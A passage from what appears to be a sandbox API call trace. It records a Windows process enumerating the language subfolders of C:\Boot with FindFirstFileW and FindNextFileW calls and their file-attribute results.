ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0156.325] FindClose (in: hFindFile=0x7375a8 | out: hFindFile=0x7375a8) returned 1 [0156.326] FindFirstFileW (in: lpFileName="C:\\Boot\\cs-CZ\\*", lpFindFileData=0x1aeeac | out: lpFindFileData=0x1aeeac*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789aa98c, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789aa98c, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789aa98c, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7375a8 [0156.326] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789aa98c, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789aa98c, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789aa98c, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0156.326] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789aa98c, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789aa98c, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x2109581d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12b58, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0156.326] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789aa98c, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789aa98c, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x2112e17f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb160, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0156.326] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789aa98c, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789aa98c, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x2112e17f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb160, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0156.326] FindClose (in: hFindFile=0x7375a8 | out: hFindFile=0x7375a8) returned 1 [0156.326] FindFirstFileW (in: lpFileName="C:\\Boot\\cs-CZ\\*.*", lpFindFileData=0x1aeeec | out: lpFindFileData=0x1aeeec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789aa98c, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789aa98c, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789aa98c, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7375a8 [0156.327] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef00 | out: lpFindFileData=0x1aef00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789aa98c, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789aa98c, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789aa98c, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0156.327] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef00 | out: lpFindFileData=0x1aef00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789aa98c, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789aa98c, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x2109581d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12b58, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0156.327] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef00 | out: lpFindFileData=0x1aef00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789aa98c, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789aa98c, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x2112e17f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb160, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0156.327] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef00 | out: lpFindFileData=0x1aef00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0156.327] FindClose (in: hFindFile=0x7375a8 | out: hFindFile=0x7375a8) returned 1 [0156.327] FindFirstFileW (in: lpFileName="C:\\Boot\\da-DK\\*", lpFindFileData=0x1aeeac | out: lpFindFileData=0x1aeeac*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789aa98c, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789aa98c, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789aa98c, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0156.327] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789aa98c, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789aa98c, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789aa98c, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0156.328] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789aa98c, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789aa98c, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x209bac02, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12760, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0156.328] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789aa98c, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789aa98c, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x2112e17f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb160, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0156.328] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789aa98c, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789aa98c, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x2112e17f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb160, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0156.328] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0156.328] FindFirstFileW (in: lpFileName="C:\\Boot\\da-DK\\*.*", lpFindFileData=0x1aeeec | out: lpFindFileData=0x1aeeec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789aa98c, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789aa98c, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789aa98c, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7375a8 [0156.328] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef00 | out: lpFindFileData=0x1aef00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789aa98c, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789aa98c, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789aa98c, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0156.328] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef00 | out: lpFindFileData=0x1aef00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789aa98c, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789aa98c, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x209bac02, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12760, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0156.329] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef00 | out: lpFindFileData=0x1aef00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789aa98c, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789aa98c, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x2112e17f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb160, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0156.329] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef00 | out: lpFindFileData=0x1aef00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0156.329] FindClose (in: hFindFile=0x7375a8 | out: hFindFile=0x7375a8) returned 1 [0156.329] FindFirstFileW (in: lpFileName="C:\\Boot\\de-DE\\*", lpFindFileData=0x1aeeac | out: lpFindFileData=0x1aeeac*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789aa98c, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789aa98c, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789aa98c, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7375a8 [0156.329] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789aa98c, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789aa98c, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789aa98c, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0156.330] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789aa98c, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789aa98c, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x209bac02, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x13560, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0156.330] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789aa98c, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789aa98c, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x2112e17f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb358, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0156.330] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789aa98c, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789aa98c, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x2112e17f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb358, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0156.330] FindClose (in: hFindFile=0x7375a8 | out: hFindFile=0x7375a8) returned 1 [0156.330] FindFirstFileW (in: lpFileName="C:\\Boot\\de-DE\\*.*", lpFindFileData=0x1aeeec | out: lpFindFileData=0x1aeeec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789aa98c, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789aa98c, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789aa98c, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7375a8 [0156.331] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef00 | out: lpFindFileData=0x1aef00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789aa98c, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789aa98c, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789aa98c, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0156.331] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef00 | out: lpFindFileData=0x1aef00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789aa98c, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789aa98c, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x209bac02, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x13560, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0156.331] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef00 | out: lpFindFileData=0x1aef00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789aa98c, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789aa98c, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x2112e17f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb358, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0156.331] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef00 | out: lpFindFileData=0x1aef00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0156.331] FindClose (in: hFindFile=0x7375a8 | out: hFindFile=0x7375a8) returned 1 [0156.332] FindFirstFileW (in: lpFileName="C:\\Boot\\el-GR\\*", lpFindFileData=0x1aeeac | out: lpFindFileData=0x1aeeac*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789aa98c, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789d0a50, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7375a8 [0156.332] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789aa98c, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789d0a50, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0156.332] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789aa98c, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789aa98c, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x209949ab, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x13960, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0156.332] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x21107f25, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb560, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0156.332] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x21107f25, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb560, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0156.332] FindClose (in: hFindFile=0x7375a8 | out: hFindFile=0x7375a8) returned 1 [0156.333] FindFirstFileW (in: lpFileName="C:\\Boot\\el-GR\\*.*", lpFindFileData=0x1aeeec | out: lpFindFileData=0x1aeeec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789aa98c, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789d0a50, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7375a8 [0156.333] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef00 | out: lpFindFileData=0x1aef00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789aa98c, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789d0a50, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0156.333] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef00 | out: lpFindFileData=0x1aef00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789aa98c, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789aa98c, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x209949ab, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x13960, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0156.333] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef00 | out: lpFindFileData=0x1aef00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x21107f25, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb560, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0156.333] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef00 | out: lpFindFileData=0x1aef00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0156.333] FindClose (in: hFindFile=0x7375a8 | out: hFindFile=0x7375a8) returned 1 [0156.333] FindFirstFileW (in: lpFileName="C:\\Boot\\en-GB\\*", lpFindFileData=0x1aeeac | out: lpFindFileData=0x1aeeac*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789d0a50, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0156.334] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789d0a50, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0156.334] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x209bac02, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12158, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0156.334] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x209bac02, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12158, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0156.334] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0156.334] FindFirstFileW (in: lpFileName="C:\\Boot\\en-GB\\*.*", lpFindFileData=0x1aeeec | out: lpFindFileData=0x1aeeec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789d0a50, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0156.334] FindNextFileW (in: hFindFile=0x737a28, 